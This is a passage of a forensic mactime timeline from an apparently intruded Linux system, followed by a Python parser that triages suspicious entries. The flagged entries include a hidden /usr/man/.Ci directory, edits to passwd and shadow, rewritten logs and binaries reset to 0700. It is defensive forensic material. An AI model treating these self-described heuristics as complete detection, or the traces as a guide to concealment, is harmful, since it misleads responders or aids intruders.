                       4615 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node11.html

                       3479 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node12.html

                       2432 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node13.html

                       6807 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node14.html

                       7418 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node15.html

                       8743 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node16.html

                       2064 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node17.html

                       2786 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node18.html

                       2165 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node19.html

                       2399 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node2.html

                       1989 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node20.html

                       2291 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node21.html

                      13506 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node22.html

                      13490 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node23.html

                      15226 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node24.html

                       2377 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node25.html

                      15230 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node26.html

                       2377 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node27.html

                       2903 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node3.html

                       3966 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node4.html

                       2623 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node5.html

                       4444 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node6.html

                       4157 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node7.html

                       3989 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node8.html

                       2756 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node9.html

                       4096 m.c drwxr-xr-x root     root     /usr/man/man5

                       6244 ..c -rw-r--r-- root     root     /usr/man/man5/exports.5.gz

                      12288 m.c drwxr-xr-x root     root     /usr/man/man8

                       2224 ..c -rw-r--r-- root     root     /usr/man/man8/exportfs.8.gz

                        376 ..c -rw-r--r-- root     root     /usr/man/man8/lockd.8.gz

                       1246 ..c -rw-r--r-- root     root     /usr/man/man8/mountd.8.gz

                        702 ..c -rw-r--r-- root     root     /usr/man/man8/nfsd.8.gz

                        788 ..c -rw-r--r-- root     root     /usr/man/man8/nfsstat.8.gz

                        341 ..c -rw-r--r-- root     root     /usr/man/man8/nhfsgraph.8.gz

                        332 ..c -rw-r--r-- root     root     /usr/man/man8/nhfsnums.8.gz

                        235 ..c -rw-r--r-- root     root     /usr/man/man8/nhfsrun.8.gz

                       4030 ..c -rw-r--r-- root     root     /usr/man/man8/nhfsstone.8.gz

                         10 mac lrwxrwxrwx root     root     /usr/man/man8/rpc.lockd.8.gz -> lockd.8.gz

                         11 .ac lrwxrwxrwx root     root     /usr/man/man8/rpc.mountd.8.gz -> mountd.8.gz

                          9 .ac lrwxrwxrwx root     root     /usr/man/man8/rpc.nfsd.8.gz -> nfsd.8.gz

                         12 .ac lrwxrwxrwx root     root     /usr/man/man8/rpc.rquotad.8.gz -> rquotad.8.gz

                         10 .ac lrwxrwxrwx root     root     /usr/man/man8/rpc.statd.8.gz -> statd.8.gz

                        476 ..c -rw-r--r-- root     root     /usr/man/man8/rquotad.8.gz

                        805 ..c -rw-r--r-- root     root     /usr/man/man8/showmount.8.gz

                        718 ..c -rw-r--r-- root     root     /usr/man/man8/statd.8.gz

                      25232 ..c -rwxr-xr-x root     root     /usr/sbin/exportfs

                       6352 ..c -rwxr-xr-x root     root     /usr/sbin/nfsstat

                      18640 ..c -rwxr-xr-x root     root     /usr/sbin/nhfsstone

                      36784 ..c -rwxr-xr-x root     root     /usr/sbin/rpc.mountd

                       3368 ..c -rwxr-xr-x root     root     /usr/sbin/rpc.nfsd

                       9872 ..c -rwxr-xr-x root     root     /usr/sbin/rpc.rquotad

                       9104 ..c -rwxr-xr-x root     root     /usr/sbin/showmount

                       1024 m.c drwxr-xr-x root     root     /var/lib/nfs

                          0 ..c -rw-r--r-- root     root     /var/lib/nfs/etab

                          0 ..c -rw-r--r-- root     root     /var/lib/nfs/rmtab

                          0 ..c -rw-r--r-- root     root     /var/lib/nfs/xtab

                      16384 m.c -rw-r--r-- root     root     /var/lib/rpm/conflictsindex.rpm

                    1343488 mac -rw-r--r-- root     root     /var/lib/rpm/fileindex.rpm

                      16384 m.c -rw-r--r-- root     root     /var/lib/rpm/groupindex.rpm

                      16384 m.c -rw-r--r-- root     root     /var/lib/rpm/nameindex.rpm

                    4173832 mac -rw-r--r-- root     root     /var/lib/rpm/packages.rpm

                      49152 m.c -rw-r--r-- root     root     /var/lib/rpm/providesindex.rpm

                      49152 m.c -rw-r--r-- root     root     /var/lib/rpm/requiredby.rpm

                      16384 m.c -rw-r--r-- root     root     /var/lib/rpm/triggerindex.rpm

                          4 mac -rw------- root     root     /var/lib/nfs/state

                          0 mac -rw-r--r-- root     root     /var/lock/subsys/nfslock

Nov 08 00 06:54:22     6416 mac -rwxr-xr-x root     root     /usr/local/bin/addr

Nov 08 00 06:54:23   271188 ..c -rwxr-xr-x root     root     /usr/local/bin/dig

                     241744 mac -rwxr-xr-x root     root     /usr/local/bin/dnsquery

                     260816 mac -rwxr-xr-x root     root     /usr/local/bin/host

                       4096 m.c drwxr-xr-x root     root     /usr/local/bin

                       3296 mac -rwxr-xr-x root     root     /usr/local/bin/mkservdb

                     241792 mac -rwxr-xr-x root     root     /usr/local/bin/nsupdate

                       4096 m.c drwxr-xr-x root     root     /usr/local/sbin

                     263960 m.c -rwxr-xr-x root     root     /usr/local/sbin/irpd

                     525412 m.c -rwxr-xr-x root     root     /usr/local/sbin/named

                       7166 mac -rwxr-xr-x root     root     /usr/local/sbin/named-bootconf

                      36960 mac -rwxr-xr-x root     root     /usr/local/sbin/ndc

                       4096 m.c drwxr-xr-x root     root     /usr/sbin

                     525412 mac -rwxr-xr-x root     root     /usr/sbin/named

                       1024 m.c drwxr-xr-x root     root     /var/run

                          5 mac -rw-r--r-- root     root     /var/run/named.pid

                          0 mac -rw------- root     root     /var/run/ndc

Nov 08 00 06:55:30     4096 m.c drwxr-xr-x root     root     /usr/libexec/awk

Nov 08 00 06:55:51       78 m.c -rw-r--r-- root     root     /usr/libexec/awk/addy.awk

Nov 08 00 06:55:58      657 m.c -rw-r--r-- root     root     /etc/passwd

                        601 m.c -rw-r--r-- root     root     /etc/shadow

Nov 08 00 06:56:02     1024 m.c drwxr-xr-x root     root     /var/log

                       7974 mac -rw-r--r-- root     root     /var/log/messages

                        268 mac -rw-r--r-- root     root     /var/log/secure

                          0 mac -rw-r--r-- root     root     /var/log/xferlog

Nov 08 00 06:56:08     4096 m.c drwxr-xr-x 1010     users    /usr/man/.Ci

Nov 08 00 06:56:59    17968 ..c -rwx------ root     root     /bin/ping

                      45388 ..c -rwx------ root     tty      /sbin/dump

                      67788 ..c -rwx------ root     tty      /sbin/restore

                      33288 ..c -rwx------ root     root     /usr/bin/at

                      35168 ..c -rwx------ root     root     /usr/bin/chage

                      36756 ..c -rwx------ root     root     /usr/bin/gpasswd

                       5640 ..c -rwx------ root     root     /usr/bin/newgrp

                     531516 ..c -rwx------ root     root     /usr/bin/sperl5.00503

                     531516 ..c -rwx------ root     root     /usr/bin/suidperl

                      34751 ..c -rwx------ root     root     /usr/libexec/pt_chown

                      16488 ..c -rwx------ root     bin      /usr/sbin/traceroute

                       5896 ..c -rwx------ root     root     /usr/sbin/usernetctl

                       1024 m.c drwxrwxrwx root     root     /tmp

Nov 08 00 06:59:07     4096 m.c drwx------ drosen   drosen   /home/drosen

                         52 mac -rw------- drosen   drosen   /home/drosen/.bash_history

                      34816 m.c drwxr-xr-x root     root     /dev

                       1024 m.c drwxrwxrwx root     root     /var/tmp

                        184 mac -rw-r--r-- root     root     /var/tmp/nap

Nov 08 00 07:03:05     3027 m.c -rw-r--r-- root     root     /etc/inetd.conf

                        512 m.c -rw------- root     root     /etc/ssh_random_seed

                          0 ..c crw--w---- root     tty      /dev/vcs1

                          0 ..c crw--w---- root     tty      /dev/vcsa1

                    1460292 mac -rw-r--r-- root     root     /var/log/lastlog

                        768 m.c -rw-r--r-- root     root     /var/log/wtmp
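The listing above is mactime output, and reading it by eye hides two things: a blank timestamp column means "same second as the line above", and the interesting entries (a setuid ssh1 under /usr/local, a hidden directory under /usr/man owned by a bare uid, log files with all three times changed at once, root-only 0700 on formerly setuid binaries with only ctime touched) are scattered among hundreds of package files. The parser below is an added example, not part of the original report or of the mactime tool itself; the sample is a short excerpt copied from the listing above, the SYSTEM_PREFIXES tuple and the triage rules in flag_suspicious() are this example's own heuristics, and the whole thing assumes the TCT-style column layout shown on this page.

```python
"""Parse a mactime-style MAC timeline and triage the entries a responder
would look at first.  Added example; SAMPLE is an excerpt of the listing
on this page, the triage rules are heuristics chosen for this example."""
import re
from collections import OrderedDict

# Column layout of the listing: an optional "Mon DD YY HH:MM:SS" stamp (blank on
# continuation lines, meaning "same time as the line above"), size, the m/a/c
# change flags, mode string, owner, group, path ("link -> target" for symlinks).
LINE_RE = re.compile(
    r"^\s*(?:(?P<ts>[A-Z][a-z]{2} \d{2} \d{2} \d{2}:\d{2}:\d{2})\s+)?"
    r"(?P<size>\d+)\s+(?P<mac>[m.][a.][c.])\s+"
    r"(?P<mode>[-dlcbps][rwxsStT-]{9})\s+"
    r"(?P<uid>\S+)\s+(?P<gid>\S+)\s+(?P<path>\S.*?)\s*$"
)

# Excerpt copied from the timeline above (constructed sample input for this example).
SAMPLE = """\
Nov 08 00 06:53:11      880 m.c -rw-r--r-- root     root     /etc/ssh_config
                          4 mac lrwxrwxrwx root     root     /usr/local/bin/ssh -> ssh1
                     604938 mac -rws--x--x root     root     /usr/local/bin/ssh1
Nov 08 00 06:55:58      657 m.c -rw-r--r-- root     root     /etc/passwd
                        601 m.c -rw-r--r-- root     root     /etc/shadow
Nov 08 00 06:56:02     1024 m.c drwxr-xr-x root     root     /var/log
                       7974 mac -rw-r--r-- root     root     /var/log/messages
                        268 mac -rw-r--r-- root     root     /var/log/secure
Nov 08 00 06:56:08     4096 m.c drwxr-xr-x 1010     users    /usr/man/.Ci
Nov 08 00 06:56:59    17968 ..c -rwx------ root     root     /bin/ping
                      45388 ..c -rwx------ root     tty      /sbin/dump
"""

# Directories where a dot-prefixed name or a numeric owner deserves a look
# (assumption of this example; tune per system).
SYSTEM_PREFIXES = ("/bin/", "/sbin/", "/usr/", "/lib/", "/etc/", "/dev/")


def parse_mactime(text):
    """Return one dict per entry, with the timestamp carried forward onto
    continuation lines and symlink targets stripped from the path."""
    records, current_ts = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError("unparsed mactime line: %r" % line)
        if m.group("ts"):
            current_ts = m.group("ts")
        rec = m.groupdict()
        rec["ts"] = current_ts
        rec["size"] = int(rec["size"])
        rec["path"] = rec["path"].split(" -> ")[0]
        records.append(rec)
    return records


def group_by_time(records):
    """Cluster paths by the second they changed, preserving timeline order."""
    groups = OrderedDict()
    for r in records:
        groups.setdefault(r["ts"], []).append(r["path"])
    return groups


def flag_suspicious(records):
    """Heuristic triage; each hit is (path, reason).  One path may hit twice."""
    hits = []
    for r in records:
        path, mode, mac, uid = r["path"], r["mode"], r["mac"], r["uid"]
        in_system = path.startswith(SYSTEM_PREFIXES)
        if in_system and any(c.startswith(".") for c in path.split("/")):
            hits.append((path, "hidden entry under a system directory"))
        if mode[3] in "sS":
            hits.append((path, "setuid bit set"))
        if uid.isdigit() and in_system:
            # mactime prints a bare uid when the passwd file it was given has
            # no entry for it: an owner that does not exist on the system.
            hits.append((path, "owner is an unresolved uid"))
        if path.startswith("/var/log/") and mac == "mac":
            hits.append((path, "log file rewritten (m, a and c changed together)"))
        if path in ("/etc/passwd", "/etc/shadow") and mac[0] == "m":
            hits.append((path, "account database modified"))
        if in_system and mode == "-rwx------" and uid == "root" and mac == "..c":
            # ctime-only change = chmod/chown without a content write.
            hits.append((path, "root-only 0700 on a system binary, ctime only"))
    return hits


if __name__ == "__main__":
    recs = parse_mactime(SAMPLE)
    for ts, paths in group_by_time(recs).items():
        print(ts, len(paths), "entries")
    for path, reason in flag_suspicious(recs):
        print("  %-28s %s" % (path, reason))
```

Run it over the full timeline (feed the whole listing instead of SAMPLE) and the timestamp groups fall out as the attacker's working sessions: a burst of package files at one second is an rpm install, a burst of /usr/local/bin ssh files is a source install, and single-file groups on /etc/passwd, /var/log/* or /etc/inetd.conf are the hand edits worth checking against the recovered shell history.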